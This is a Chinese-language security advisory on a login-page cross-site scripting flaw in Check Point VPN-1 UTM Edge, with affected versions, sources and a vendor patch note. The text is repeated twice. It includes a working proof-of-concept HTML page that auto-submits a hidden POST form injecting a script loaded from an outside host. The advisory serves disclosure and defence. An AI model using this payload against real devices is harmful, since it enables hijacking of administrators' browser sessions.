Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞
sxl0 2008-10-07
受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.0.48x
不受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.5.48
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28116VPN-1 UTM Edge是集成了防病毒、防火墙、入侵防护和VPN技术的安全接入解决方案。 VPN-1 UTM Edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。VPN-1 UTM Edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。由于设备不接受GET请求中的参数,因此攻击者必须要使用POST请求来利用这个漏洞。<*来源:Henri Lindberg ([email protected])
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none"><input name="user" value="'<script/src=//l7.fi></script>"></form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.checkpoint.com
Check Point Software VPN-1 UTM Edge NGX 7.0.48x
不受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.5.48
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28116VPN-1 UTM Edge是集成了防病毒、防火墙、入侵防护和VPN技术的安全接入解决方案。 VPN-1 UTM Edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。VPN-1 UTM Edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。由于设备不接受GET请求中的参数,因此攻击者必须要使用POST请求来利用这个漏洞。<*来源:Henri Lindberg ([email protected])
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none"><input name="user" value="'<script/src=//l7.fi></script>"></form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.checkpoint.com
相关推荐
fubrty 0喜欢 / 0评论 2020-09-08
84226832 0喜欢 / 0评论 2020-08-12
pxy 0喜欢 / 0评论 2020-08-15
84271849 0喜欢 / 0评论 2020-08-07
ELEMENTS爱乐小超 0喜欢 / 0评论 2020-05-28
0喜欢 / 0评论 2020-05-27
aliuge 0喜欢 / 0评论 2020-05-12
fraternityjava 0喜欢 / 0评论 2020-05-09
84483762 0喜欢 / 0评论 2020-05-03
sapliang 0喜欢 / 0评论 2020-04-24
Walter的学习笔记 0喜欢 / 0评论 2020-03-04
Aggressivesnail 0喜欢 / 0评论 2020-03-03
阳光岛主 0喜欢 / 0评论 2020-02-21
hell0kitty 0喜欢 / 0评论 2020-02-19
tozeroblog 0喜欢 / 0评论 2020-02-17
baixiaoshi 0喜欢 / 0评论 2020-01-09
GoatSucker 0喜欢 / 0评论 2020-01-01
ShiShuo 0喜欢 / 0评论 2019-12-31
87226636 0喜欢 / 0评论 2015-06-30
Moabi 0喜欢 / 0评论 2015-05-16
lyqcsdn 0喜欢 / 0评论 2019-12-24
meilongwhpu 0喜欢 / 0评论 2019-12-22
MojitoBlogs 0喜欢 / 0评论 2019-12-17
guijianchou 0喜欢 / 0评论 2019-12-17
wyzxzws 0喜欢 / 0评论 2019-12-15
zhujuyu 0喜欢 / 0评论 2019-12-12
pxy 0喜欢 / 0评论 2019-12-08
AlexTan 0喜欢 / 0评论 2019-12-06
yubei 0喜欢 / 0评论 2019-11-19
看上去很美 0喜欢 / 0评论 2019-11-12
photoed 0喜欢 / 0评论 2019-11-04
wuyemenghuirt 0喜欢 / 0评论 2019-11-03
LuoXinLoves 0喜欢 / 0评论 2019-11-03
Aggressivesnail 0喜欢 / 0评论 2019-10-31
87324554 0喜欢 / 0评论 2011-05-23
极乐净土 0喜欢 / 0评论 2013-11-22
UC浏览器搜索引擎 0喜欢 / 0评论 2015-08-27
zhuce 0喜欢 / 0评论 2018-08-23
DukeLisa 0喜欢 / 0评论 2017-07-18
莫冲 0喜欢 / 0评论 2018-03-29
zhuce 0喜欢 / 0评论 2018-09-24
少莫千华 0喜欢 / 0评论 2017-07-18
81286435 0喜欢 / 0评论 2018-06-27
85296630 0喜欢 / 0评论 2018-05-24
85266438 0喜欢 / 0评论 2017-09-03
89276434 0喜欢 / 0评论 2017-06-09
84246736 0喜欢 / 0评论 2017-05-07
89256538 0喜欢 / 0评论 2017-02-19
MichaelChan 0喜欢 / 0评论 2017-01-24
迈克揉索芙特 0喜欢 / 0评论 2017-01-20